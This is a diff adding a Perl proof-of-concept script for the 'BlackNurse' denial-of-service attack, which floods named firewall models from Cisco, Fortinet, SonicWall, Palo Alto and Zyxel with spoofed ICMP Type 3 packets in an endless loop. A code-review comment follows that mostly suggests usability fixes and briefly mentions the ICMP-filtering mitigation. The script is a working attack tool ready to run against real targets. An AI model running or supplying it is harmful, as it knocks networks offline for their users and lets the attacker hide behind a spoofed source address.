|
| 1 | +#!/usr/bin/perl |
| 2 | +# |
| 3 | +# Cisco ASA 5515/5525/5550/5515-X | Fotinet | |
| 4 | +# Fortigate | SonicWall | PaloAlto | Zyxel NWA3560-N | |
| 5 | +# Zyxel Zywall USG50 Spoofed "BlackNurse" DoS PoC |
| 6 | +# |
| 7 | +# Copyright 2016 (c) Todor Donev |
| 8 | +# Varna, Bulgaria |
| 9 | + |
| 10 | +# https://www.ethical-hacker.org/ |
| 11 | +# https://www.facebook.com/ethicalhackerorg |
| 12 | +# http://pastebin.com/u/hackerscommunity |
| 13 | +# |
| 14 | +# |
| 15 | +# Description: |
| 16 | +# Blacknurse is a low bandwidth ICMP attack that is capable of doing denial |
| 17 | +# of service to well known firewalls. Most ICMP attacks that we see are based |
| 18 | +# on ICMP Type 8 Code 0 also called a ping flood attack. BlackNurse is based |
| 19 | +# on ICMP with Type 3 Code 3 packets. We know that when a user has allowed ICMP |
| 20 | +# Type 3 Code 3 to outside interfaces, the BlackNurse attack becomes highly |
| 21 | +# effective even at low bandwidth. Low bandwidth is in this case around 15-18 |
| 22 | +# Mbit/s. This is to achieve the volume of packets needed which is around 40 to |
| 23 | +# 50K packets per second. It does not matter if you have a 1 Gbit/s Internet |
| 24 | +# connection. The impact we see on different firewalls is typically high CPU |
| 25 | +# loads. When an attack is ongoing, users from the LAN side will no longer be |
| 26 | +# able to send/receive traffic to/from the Internet. All firewalls we have seen |
| 27 | +# recover when the attack stops. |
| 28 | +# |
| 29 | +# Disclaimer: |
| 30 | +# This or previous program is for Educational purpose ONLY. Do not |
| 31 | +# use it without permission. The usual disclaimer applies, especially |
| 32 | +# the fact that Todor Donev is not liable for any damages caused by |
| 33 | +# direct or indirect use of the information or functionality provided |
| 34 | +# by these programs. The author or any Internet provider bears NO |
| 35 | +# responsibility for content or misuse of these programs or any |
| 36 | +# derivatives thereof. By using these programs you accept the fact |
| 37 | +# that any damage (dataloss, system crash, system compromise, etc.) |
| 38 | +# caused by the use of these programs is not Todor Donev's |
| 39 | +# responsibility. |
| 40 | +# |
| 41 | +# Use at your own risk and educational |
| 42 | +# purpose ONLY! |
| 43 | +# |
| 44 | +# Thanks to Maya (Maiya|Mia) Hristova and all my friends |
| 45 | +# that support me. |
| 46 | +# |
| 47 | +# |
| 48 | + |
| 49 | +use Net::RawIP; |
| 50 | + |
| 51 | +print "[ Cisco ASA 5515/5525/5550/5515-X | Fotinet | Fortigate | SonicWall | PaloAlto | Zyxel NWA3560-N | Zyxel Zywall USG50 Spoofed \"BlackNurse\" DoS PoC\n"; |
| 52 | +print "[ ======\n"; |
| 53 | +print "[ Usg: $0 <spoofed address> <target>\n"; |
| 54 | +print "[ Example: perl $0 133.71.33.7 192.168.1.1\n"; |
| 55 | +print "[ ======\n"; |
| 56 | +print "[ <todor.donev\@gmail.com> Todor Donev\n"; |
| 57 | +print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n"; |
| 58 | +print "[ Website: https://www.ethical-hacker.org/\n"; |
| 59 | + |
| 60 | +my $spoof = $ARGV[0]; |
| 61 | +my $target = $ARGV[1]; |
| 62 | + |
| 63 | +my $sock = new Net::RawIP({ icmp => {} }) or die; |
| 64 | + |
| 65 | +print "[ Sending crafted packets..\n"; |
| 66 | +while () { |
| 67 | + $sock->set({ ip => { saddr => $spoof, daddr => $target}, |
| 68 | + icmp => { type => 3, code => 3} }); |
| 69 | + $sock->send; |
| 70 | + $sock->set({ icmp => { type=>3, code => 0}}); |
| 71 | + $sock->send; |
| 72 | + $sock->set({ icmp => { type=>3, code => 1}}); |
| 73 | + $sock->send; |
| 74 | + $sock->set({ icmp => { type=>3, code => 2}}); |
| 75 | + $sock->send; |
| 76 | +} |
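Review bot: The script never checks its arguments: the usage banner is printed unconditionally and execution falls straight through to `my $spoof = $ARGV[0];` and the `while ()` loop, so a run with no or only one argument still reaches `$sock->send` with undefined addresses. Guard it before the socket is created, e.g. `die "usage: $0 <spoofed address> <target>\n" unless @ARGV == 2;`, and add `use strict; use warnings;` above `use Net::RawIP;`. The loop also has no packet cap or duration bound, so a lab run can only be ended by killing the process; a bounded count would keep a test against your own equipment controllable. The header comment describes the impact but not the countermeasure; a line noting that rate-limiting or filtering inbound ICMP Type 3 Codes 0-3 on the outside interface (leaving Code 4 for path-MTU discovery) is the commonly cited mitigation would make the file more useful to defenders.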